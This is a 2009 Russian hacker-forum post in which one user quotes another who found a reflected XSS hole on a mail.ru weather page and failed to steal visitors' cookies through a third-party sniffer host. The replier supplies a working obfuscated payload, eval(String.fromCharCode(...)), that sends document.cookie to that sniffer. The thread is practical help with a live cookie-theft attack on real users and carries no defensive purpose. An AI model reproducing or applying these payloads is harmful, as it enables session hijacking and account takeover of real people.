12.09.2009, 18:45
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами:
10058786
Репутация:
4589
|
|
Сообщение от Cehennem
Опять вопросик у меня.
Нашёл xss:
http://pogoda.mail.ru/favcity/citytune.html?action=tune&city=%22%3E%3Cscript%3Ea lert(%27xss%27)%3C/script%3E
Захожу на ссылку срабатывает alert и показывает рамку xss.
Пошёл на сниффер http://hacker-pro.net/sniffer/ и сделал редикет, но не сработало, даже взов не бросает снифферу, так-как лог пустой.
Ну решил поменять сниффер и пошёл на сниффер www.sniffer.xaknet.ru и сделал следующее:
вставил ссылку из сниффер вместо alert:
http://pogoda.mail.ru/favcity/citytune.html?action=tune&city="><script>img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img__1392.gif?"+document.cookie;</script>
и так испробовал несколько ссылок, но лог ПУСТОЙ! Что делать?
А можете сами быстринко поставить нужную ссылку и джать мне адрес сниффера, а потом я буду эксприментировать и найду разницу и свою ошибку.
Поможете?
http://pogoda.mail.ru/favcity/citytune.html?action=tune&city="><script>eval(Stri ng.fromCharCode(105,109,103,32,61,32,110,101,119,3 2,73,109,97,103,101,40,41,59,32,105,109,103,46,115 ,114,99,32,61,32,34,104,116,116,112,58,47,47,115,1 10,105,102,102,101,114,46,120,97,107,110,101,116,4 6,114,117,47,115,109,105,108,101,115,47,105,109,10 3,95,95,49,51,57,50,46,103,105,102,63,34,43,100,11 1,99,117,109,101,110,116,46,99,111,111,107,105,101 ,59))</script><!--+
не забудь пробелы вырезать
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид